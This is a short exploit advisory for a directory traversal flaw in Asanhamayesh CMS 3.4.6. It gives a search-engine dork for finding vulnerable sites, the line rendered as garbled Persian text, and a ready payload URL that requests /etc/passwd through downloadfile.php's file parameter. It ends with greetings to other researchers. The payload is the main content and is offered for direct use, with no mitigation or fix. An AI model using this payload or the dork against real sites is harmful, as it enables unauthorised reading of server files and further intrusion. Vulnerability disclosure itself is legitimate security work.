================================================================================================= | # Title : Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Dork : Ø·Ø±Ø§Ø Ùˆ پشتیبان : آسان همایش (نرم Ø§ÙØ²Ø§Ø± مدیریت همایش Ùˆ Ú©Ù†ÙØ±Ø§Ù†Ø³) ویرایش 3.4.6 | ================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine . [+] use payload : /downloadfile.php?file=../../../../../../../../../../etc/passwd [+] http://127.0.0.1/itjdconfir/fa/downloadfile.php?file=../../../../../../../../../../etc/passwd ====Greetings to :=================================================================================================================== | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =====================================================================================================================================